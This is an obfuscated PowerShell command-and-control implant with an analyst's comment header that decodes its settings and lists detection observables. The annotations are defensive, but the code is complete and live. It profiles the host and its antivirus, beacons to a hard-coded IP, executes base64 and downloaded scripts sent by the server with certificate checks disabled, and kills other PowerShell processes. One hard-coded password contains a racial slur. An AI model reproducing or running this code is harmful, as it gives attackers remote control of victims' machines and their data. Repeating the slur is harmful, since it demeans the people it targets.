<#
Obfuscated PowerShell C2 implant (analysis annotations only; the code below is untouched).

Obfuscation in use: every .NET type name, cmdlet name, property name and string constant
is rebuilt at runtime with the -f format operator from reordered fragments, identifiers
are split with backticks (e.g. ${GLOB`AL`:_`HOsT}), and static members are reached via
(Get-Item variable:...).Value::Member. The decoded names are therefore never present on
disk; script block logging (the post-expansion text) is where they become visible.

Decoded configuration (all values come from this listing):
  $global:_host     = "%host%,194.59.30.189"  -- "%host%" looks like an unfilled builder
                       placeholder; PostC2 skips it explicitly, so only the literal IP is used.
  $global:_port     = "8080"; beacon URL is https://<ip>:8080/<query>.
  $global:h_id      = "SvONr_" + 5 random ASCII letters (Get-Random -Count 5 over 65..90 + 97..122).
  $global:h_package = "<|>"  -- field separator for the host profile string.
  $global:h_sleep   = 3       -- seconds between beacons.
  $global:h_endpoint= "api/main"; observed paths: api/main/init, api/main/modules, api/main/log.
  $global:h_hash    = "D84AD148D7CF77F0C4F2D64CCDBD84D186EE41D9"  -- pinned server certificate
                       thumbprint (compared against GetCertHashString()).
  $global:h_auth    = hard-coded Basic-auth username and password (decoded at runtime).
  $global:modules.list = ".\me\persistence\main.ps1" (the 'aNV' -creplace '\' trick).
  TLS: ServicePointManager::SecurityProtocol is forced to Tls12 before any request.

Function summary (names decoded from the -f fragments):
  SSLPinning([bool]$pinning=$true)
      Installs ServerCertificateValidationCallback. With pinning on, the callback returns
      $true only when $global:h_hash -like <remote GetCertHashString()>; with pinning off it
      returns $true unconditionally, i.e. certificate validation is disabled for that call.
      (-like is a wildcard comparison; for a plain hex string this is a case-insensitive equality.)
  Main
      Builds the host profile once via Information, then loops while $global:h_running:
      PostC2 "api/main/init"; on a truthy response calls LoadModules; Start-Sleep -s 3.
  LoadModules
      If $global:modules.running is false, posts $global:modules.list to "api/main/modules".
  Information
      Host profiling: Win32_LogicalDisk C: VolumeSerialNumber, $env:COMPUTERNAME, $env:USERNAME,
      Win32_OperatingSystem Caption, root/SecurityCenter2 AntivirusProduct displayName (joined
      with " - "), the literal version tag "[V2.0]" and "_"; all joined with "<|>" after the id.
      The CIM queries (especially root/SecurityCenter2) are a useful telemetry hook.
  PostC2([string]$query, [string]$data='')
      Calls SSLPinning, creates System.Net.WebClient (UTF8), sets headers:
        User-Agent: fixed Chrome 91 / Windows 10 string,
        Authorization: "Basic " + Base64(ASCII("user:pass")) from $global:h_auth,
        X-Request-ID: Base64(UTF8($global:h_info))  -- the host profile rides in this header.
      Iterates $global:_host split on ','; skips "%host%"; UploadString(url, $data) and hands a
      non-empty response to ParseC2; returns $true on first success, $false otherwise; errors are
      swallowed (empty catch); WebClient disposed in finally.
  ExecPlugin([string]$param_script, [bool]$param_plugin=$true)
      Base64-decodes $param_script to UTF8 text, wraps it in [scriptblock]::Create and runs it as
      a child job (Start-Job / Wait-Job -Timeout 3). Plugin mode passes h_ip, _port, h_id and
      h_auth as -ArgumentList. A Failed job re-throws the child's JobStateInfo.Reason.Message.
  ClearPowershell
      Get-Process powershell and Stop-Process -Force every instance whose Id is not $pid.
  ClearJob
      Get-Job | Remove-Job -Force.
  ParseC2([string]$data)
      First line of the response (lower-cased) selects the action, the remainder is the payload:
        main.modules        -> Start-Job on the payload as a scriptblock; modules.running = $true
        main.plugin         -> ExecPlugin <payload>
        main.execute.local  -> ExecPlugin <payload> $false
        main.execute.remote -> SSLPinning $false; DownloadString(<url line>) then ExecPlugin ... $false
        main.sleep          -> Start-Sleep -s (<line> -as [int])   (seconds, despite the "ms" name)
        main.clear          -> ClearJob
        main.exit           -> ClearPowershell
        main.uninstall      -> ClearPowershell; Exit(1)
      Any exception is reported back to "api/main/log" as "[exception]\r\nmessage = ...\r\ntrace = ...".
  Entry point: the last statement invokes Main.

Detection-relevant observables: outbound HTTPS to a non-standard port with a static
Authorization header and an X-Request-ID header that base64-decodes to a "<|>"-delimited host
profile; root/SecurityCenter2 AntivirusProduct and Win32_LogicalDisk CIM queries from
powershell.exe; Start-Job child processes executing base64-decoded script; Stop-Process -Force
against sibling powershell.exe processes; the ServicePointManager callback override.
#>
set ('3'+'Sot64') ( [tYPe]("{1}{5}{4}{2}{3}{0}"-f'typE','Sy','uRit','yPROTOCOL','.Net.seC','STem') );$C5i= [tyPE]("{6}{2}{4}{3}{0}{5}{1}{7}"-F'i','ePOIn','m.nET.','V','seR','C','SySTe','tMaNaGeR'); $eZ0dO = [TYpe]("{2}{0}{1}" -F 'nVE','rT','co') ; $sLHdF=[TYpe]("{5}{2}{4}{1}{0}{3}" -F'N','.E','YSTE','Coding','M.tExt','s') ; $8HFs = [tyPe]("{3}{1}{2}{0}" -F'ErT','.CON','v','SystEm') ; sv lapVmG ([TyPE]("{2}{0}{1}"-F 'crIpTBl','OCk','s')) ; ${GLOB`AL`:_`HOsT} = ("{2}{3}{1}{5}{0}{4}" -f '0','194.5','%host%',',','.189','9.3') ${glO`BAL`:`_PORt} = ("{0}{1}" -f'8','080') ${GL`o`BAL:h`_ID} = ("{1}{0}" -f'Nr_','SvO') + -join ((65..90) + (97..122) | &("{2}{0}{1}" -f 'Ran','dom','Get-') -Count 5 | &("{0}{2}{4}{1}{3}" -f'F','je','orEach-','ct','Ob') {[char]${_}}) ${GL`O`B`AL:H_paC`kaGE} = '<|>' ${G`l`ObA`L:h_w`EB} = ${nu`LL} ${glOb`AL`:`h_SLeep} = 3 ${Glob`A`L:h`_info} = ${n`UlL} ${Glo`BAL:h`_ru`NnINg} = ${Tr`UE} ${G`lO`BaL:H_iP} = ${nU`ll} ${gLO`B`A`l`:h_en`DpoINt} = ("{2}{0}{1}"-f 'ai','n','api/m') ${GLo`BAl`:h_hASh} = ("{0}{1}{6}{3}{5}{7}{4}{2}"-f'D84A','D148D7CF77F','D9','2D64CCDBD84D1','1','86EE','0C4F','4') ${gLoBA`l:`h_aUth} = @{ ("{1}{0}"-f 'er','us') = ("{2}{1}{0}" -f 'son','n','longjoh') ("{1}{0}" -f 'ss','pa') = ("{1}{2}{3}{0}{4}"-f'atniggers','ug','hihat','ef','123') } ${g`LO`BAL:mOd`UlES} = @{ ("{2}{0}{1}"-f 'nin','g','run') = ${faL`sE} ("{1}{0}" -f 'ist','l') = ((("{4}{1}{2}{7}{3}{5}{0}{9}{6}{8}"-f'main','per','si','cea','.aNVmeaNV','NV','p','sten','s1','.')) -cREPlAce ([char]97+[char]78+[char]86),[char]92) } (LS VaRiAbLe:c5I ).ValuE::"securItYP`Ro`T`OcOl" = $3SoT64::"T`ls12"; function sS`Lp`IN`NINg { param ([bool]${pinn`INg}=${Tr`UE}) if (${P`I`NnINg}) { ( get-vaRIABlE C5i -VALueoNL )::"S`ERVE`RCER`T`ificaTEValidati`oN`c`A`Ll`Ba`cK" = { param(${_`SE`NDeR},${_cErtIFI`cA`TE},${_`c`haiN},${_SSLpo`Li`cyeRro`RS}) ${r`EMOt`E_Ha`sh} = ${_CErtIf`iCA`TE}.("{4}{0}{3}{1}{2}"-f 'er','hStri','ng','tHas','GetC').Invoke() if (${G`lOBal:`h`_hAsh} -like ${REMOTe`_`haSh}) { 
# Pin matched: the presented server certificate's thumbprint equals $global:h_hash (wildcard -like, case-insensitive).
return ${T`RUE} } else { return ${FA`L`sE} } } } else { (DIR ("vA"+"riAbLe"+":C5"+"i")).valuE::"sER`Ve`RCe`Rtif`iCA`TEVALiDat`ion`C`ALlbacK" = { return ${TR`Ue} } } } function mA`In { param () ${g`lob`Al`:h_inFO} = &("{0}{3}{2}{1}" -f 'I','ion','t','nforma') while (${GLO`BAL:H_`RUNn`I`Ng}) { if (&("{1}{0}"-f 'ostC2','P') "$global:h_endpoint/init") { &("{1}{0}{3}{2}" -f'adMod','Lo','es','ul') } &("{0}{3}{2}{1}" -f 'St','leep','-S','art') -s ${gL`OBA`l:H_sl`EEp} } } function LOaD`Mo`Du`leS { param () if (-not ${GLO`B`AL:M`oDules}."rUN`N`inG") { &("{0}{1}" -f 'Pos','tC2') "$global:h_endpoint/modules" (${GLo`B`A`L`:MODUleS}."lI`sT" -join "`r`n") | &("{2}{1}{0}" -f '-Null','t','Ou') } } function inf`Orm`ATION { param () ${H_H`W`iD} = &("{1}{0}{2}" -f 'In','Get-Cim','stance') -Class ("{3}{0}{4}{2}{1}"-f'in32_','disk','cal','w','logi') -Filter ((("{2}{3}{0}{1}"-f' = {0}','C:{0}','Devic','eID')) -F [CHAr]39) | &("{2}{0}{1}" -f 'Obje','ct','Select-') -ExpandProperty ("{3}{1}{2}{0}" -f'er','alnum','b','volumeseri') ${h_H`W`ID} = ${h`_h`WiD}.("{1}{0}{2}"-f'pla','re','ce').Invoke("`r`n","") ${h_c`omP`UtER`N`Ame} = ${env:`coM`P`U`TernAMe} ${H_`Us`ERna`Me} = ${Env:u`s`ER`NAMe} ${H_`Os} = &("{2}{3}{1}{0}" -f'nstance','imI','Get-','C') -Class ("{4}{2}{0}{1}{3}" -f 'r','a','n32_Ope','tingSystem','Wi') | &("{3}{4}{0}{2}{1}"-f '-','ect','Obj','Se','lect') -ExpandProperty ("{1}{2}{0}"-f 'ption','c','a') | &("{2}{1}{0}{3}" -f 'i','Str','Out-','ng') ${h_`os} = ${H_`oS}.("{0}{1}{2}"-f'repl','a','ce').Invoke("`r`n","") ${H_vE`R`SiOn} = ("{1}{0}"-f '2.0]','[V') ${H_E`DR} = &("{3}{1}{0}{2}" -f'nstan','-CimI','ce','Get') -Namespace ("{2}{3}{5}{1}{4}{6}{0}" -f '2','e','root/','Secur','nt','ityC','er') -ClassName ("{4}{1}{3}{2}{0}" -f 't','s','c','Produ','Antiviru') | &("{0}{1}{2}"-f 'Select-','Obje','ct') -ExpandProperty ("{1}{0}{2}{3}" -f'i','d','spl','ayname') | &("{2}{1}{0}"-f'ing','-Str','Out') ${H_`E`DR} = ${h_`EdR}.("{1}{2}{0}" -f 'ce','repl','a').Invoke("`r`n"," - ") ${h_S`P`R`EaD} = 
'_' return ${H`_iD} + '_' + ${H`_h`WiD} + ${H`_PAcK`Age} + ${h_C`OmP`UtER`NamE} + ${H_p`AC`kAGE} + ${h_US`ERN`AmE} + ${H_P`AcKa`Ge} + ${H_`OS} + ${h_`pac`KaGe} + ${H`_veRs`Ion} + ${h`_pa`ckaGe} + ${H_`Edr} + ${h_pA`Ck`AGE} + ${H_`Spre`AD} + ${h`_`PacK`AgE} } function poST`c2 { param ( [String] ${Qu`Ery}, [String] ${DA`TA} = '' ) &("{0}{1}{2}" -f 'S','SLPinni','ng') ${GLO`BaL:H`_W`Eb} = &("{0}{2}{1}" -f 'New-','ject','Ob') ("{2}{0}{5}{3}{1}{6}{4}"-f't','.W','Sys','.Net','ent','em','ebCli') ${gLOBAl:`H_`wEB}."En`c`oDINg" = ( gI ('V'+'ARiablE'+':slh'+'df') ).Value::"u`Tf8" try { ${gLoBAL`:H_w`EB}."HEAd`ERS"[("{0}{2}{1}" -f'User-A','nt','ge')] = ("{33}{32}{7}{4}{18}{13}{2}{31}{19}{27}{24}{1}{14}{11}{15}{28}{25}{21}{17}{9}{3}{5}{22}{30}{12}{6}{8}{0}{10}{26}{23}{29}{20}{16}" -f 'e/91.0.447',' x','T 10.0;','.36 ','Win','(','o) ','(','Chrom','7','2.1',') Appl',' Geck','ows N','64','eW','/537.36','3','d','Wi','i','it/5','KHTML, li','Safa','4;','K','24 ','n6','eb','r','ke',' ','a/5.0 ','Mozill') ${glOb`AL:`h_weB}."H`EaD`Ers"[("{0}{1}{2}" -f'Auth','ori','zation')] = ("{1}{0}" -f 'asic ','B') + $8hfS::"tO`BaS`E6`4s`TRINg"( ( Gci variaBLe:SLhdF ).Value::"as`cii".("{2}{0}{1}" -f 'etByte','s','G').Invoke(${gL`obAl:H_A`UTH}."us`ER" + ":" + ${GLObaL`:h_`AuTh}."pA`ss")); ${g`lObal`:`H_WEb}."HeA`D`Ers"[("{1}{0}{3}{2}" -f'uest','X-Req','ID','-')] = ( iteM ("vAriA"+"BLe"+":E"+"z"+"0DO") ).VaLuE::"T`OBaS`E64S`T`RINg"( ( get-iTEm vAriABLE:SLhDF ).vAlUE::"u`TF8".("{0}{1}" -f 'GetBy','tes').Invoke(${glob`AL`:h`_InFo})) foreach (${IP} in ${_`hOsT}.("{1}{0}" -f'plit','s').Invoke(',')) { if (${I`P} -eq ("{1}{0}{2}" -f'o','%h','st%')) {continue} ${gLob`Al:H`_Ip} = ${I`p} ${U`RL} = ("{1}{0}{2}" -f'tp','ht','s://') + ${h`_iP} + ':' + ${_p`OrT} + '/' + ${QU`Ery} try { ${resp`O`Nse} = ${G`LoBa`L:H_Web}.("{2}{0}{1}{3}"-f 'lo','adSt','Up','ring').Invoke(${U`RL}, ${dA`TA}) if (${RESpON`sE}) {&("{0}{1}{2}"-f'Pa','rseC','2') ${ReSP`ON`se}} return ${tR`UE} } catch { } } return ${fAL`Se} } finally { if 
(${G`Loba`L:H`_w`Eb}) { ${gLoB`Al`:`H_WEB}.("{1}{0}{2}"-f'os','disp','e').Invoke() ${glob`A`l:h`_`Web} = ${N`ULl} } } } function exE`cp`LuGiN { param ( [String]${pA`R`AM_scrI`PT}, [bool]${p`ArAm`_pl`U`gIn}=${T`RuE} ) ${Scri`PT_b`L`OCk} = ( GEt-chilDiTeM ("varIAble"+":"+"LA"+"pvMg") ).vALuE::"CrEA`TE"( ( gci ("v"+"ari"+"abL"+"e:sLHdf")).valUe::"U`TF8"."geT`StRi`Ng"( ( dIR ("vaRi"+"Able:"+"8hfS")).vaLUe::("{0}{1}{4}{3}{2}" -f 'F','romBase64S','g','rin','t').Invoke(${PAra`M_`Sc`RI`PT}))) if (${PA`Ram_pL`UG`iN}) { ${j`oB} = &("{1}{0}{2}"-f 'ta','S','rt-Job') -ScriptBlock ${SCR`I`p`T_Bl`OCK} -ArgumentList ${g`loBAl`:h_iP},${G`lo`BAL:_pORT},${glOb`AL`:`h_id},${gl`ObAL:`H_`Auth} | &("{0}{1}{2}" -f 'Wa','i','t-Job') -Timeout 3 } else { ${j`ob} = &("{2}{1}{0}" -f'-Job','rt','Sta') -ScriptBlock ${Scr`Ipt_B`LOcK} | &("{1}{0}" -f'-Job','Wait') -Timeout 3 } if (${J`OB}."st`Ate" -eq ("{0}{1}" -f'Fa','iled')) { throw ${j`OB}."ChilDJO`BS"[0]."JoBsta`T`EI`NFo"."re`ASON"."m`E`sSAgE" } } function CL`E`ArPOwerSheLl { &("{2}{1}{0}" -f'ss','-Proce','Get') ("{2}{1}{0}"-f'ell','rsh','powe') -ErrorAction ("{4}{2}{0}{3}{1}" -f'yC','inue','ilentl','ont','S') | &("{0}{1}{2}"-f'ForEac','h-','Object') { if (${p`ID} -ne ${_}."i`d") { &("{1}{3}{2}{0}" -f'ss','S','ce','top-Pro') -Force -Id ${_}."I`D" } } } function cleaR`j`oB { &("{2}{1}{0}"-f 'b','-Jo','Get') | &("{2}{1}{0}" -f '-Job','ve','Remo') -Force } function PaR`SEc2 { param ( [String]${dA`Ta} ) try { ${DATA`_sT`ReAM} = [System.IO.TextReader](&("{1}{2}{0}"-f 'bject','new','-o') ("{2}{3}{4}{0}{1}"-f'.IO.StringReade','r','S','yst','em')(${dA`Ta})) if (${dAta_sT`RE`AM}."len`gtH" -gt 0) { ${c`oM`MaND} = ${D`A`TA_sTR`EAM}.("{1}{0}{2}"-f 'Lin','Read','e').Invoke() switch (${C`Om`manD}.("{0}{2}{1}" -f 'T','er','oLow').Invoke()) { ("{2}{0}{1}{3}"-f'i','n.module','ma','s') { ${p`ARaM`_M`ODULeS} = ${da`TA_`sT`ReAM}.("{0}{2}{1}"-f'Re','d','adToEn').Invoke(); if (${parAm_m`o`dUL`Es}) { &("{0}{1}{2}" -f'Start-J','o','b') -ScriptBlock ( ( Gi 
vARiAble:LApvmg).VAlUE::("{1}{0}"-f 'te','Crea').Invoke(${pARA`m_`modULes})) | &("{0}{1}"-f'O','ut-Null') ${gLO`BA`l`:modUL`ES}."R`U`NNiNG" = ${t`RUE} } break } ("{2}{0}{1}" -f 'in.p','lugin','ma') { ${P`Aram`_S`cR`ipT} = ${D`Ata_`STre`Am}.("{1}{0}"-f'nd','ReadToE').Invoke(); if (${p`ArAM`_sC`RIpt}) { .("{2}{0}{1}" -f'ugi','n','ExecPl') ${PAR`Am_SCRi`pt} } break } ("{2}{1}{3}{4}{0}" -f 'al','.l','main.execute','o','c') { ${PA`RaM`_`sCRIpT} = ${DaTA_`S`TREAm}.("{2}{0}{1}"-f 'adToEn','d','Re').Invoke(); if (${PArA`m`_sCRIPt}) { .("{2}{0}{1}{3}" -f'l','ugi','ExecP','n') ${pARAm_ScR`i`pT} ${f`ALsE} } break } ("{1}{3}{2}{0}"-f'te','main.e','mo','xecute.re') { ${PAra`m_`Url} = ${daTA`_S`T`Ream}.("{2}{1}{0}" -f 'e','in','ReadL').Invoke() if (${Pa`R`Am_URL}) { .("{1}{0}{2}" -f'S','S','LPinning') ${f`AL`SE} ${P`ArAm_`SCr`IPT} = (.("{2}{1}{0}"-f'ject','-Ob','New') ("{0}{2}{1}{4}{3}"-f 'sy','et.','stem.N','bClient','We')).("{3}{0}{2}{1}" -f'ownloa','g','dStrin','d').Invoke(${Par`A`M_`UrL}) if (${pA`RaM`_scRiPT}) { &("{1}{2}{0}"-f'ugin','E','xecPl') ${PARam_`S`cR`iPt} ${FA`L`se} } } break } ("{2}{0}{1}"-f 'i','n.sleep','ma') { ${pArA`M_mS} = ${Dat`A`_sTreAm}.("{2}{0}{1}"-f 'ead','Line','R').Invoke() &("{2}{3}{1}{0}" -f 'Sleep','-','Sta','rt') -s (${par`Am`_ms} -as [int]) break } ("{1}{0}{2}{3}"-f 'in.c','ma','l','ear') { .("{1}{0}" -f 'earJob','Cl') break } ("{0}{1}{2}" -f 'main.','e','xit') { .("{1}{0}{3}{2}"-f 'ea','Cl','Powershell','r') break } ("{2}{1}{0}" -f 'all','nst','main.uni') { &("{2}{1}{0}{4}{3}"-f 'r','Powe','Clear','hell','s') Exit(1) } } } } catch { ${MeSS`AGe} = ${_}."e`xcEp`T`iON"."M`ESsAge" ${T`RA`ce} = ${_}."excePtI`on"."s`TaCktr`AcE" ${Re`Spo`N`sE} = ("[exception]`r`nmessage "+'= '+"$message`r`ntrace "+'= '+"$trace") .("{1}{0}{2}"-f'ostC','P','2') "$global:h_endpoint/log" ${rEs`Po`NSe} } } &("{1}{0}" -f 'n','Mai')
# Entry point: the line above invokes Main, which beacons to api/main/init every $global:h_sleep seconds until $global:h_running is cleared.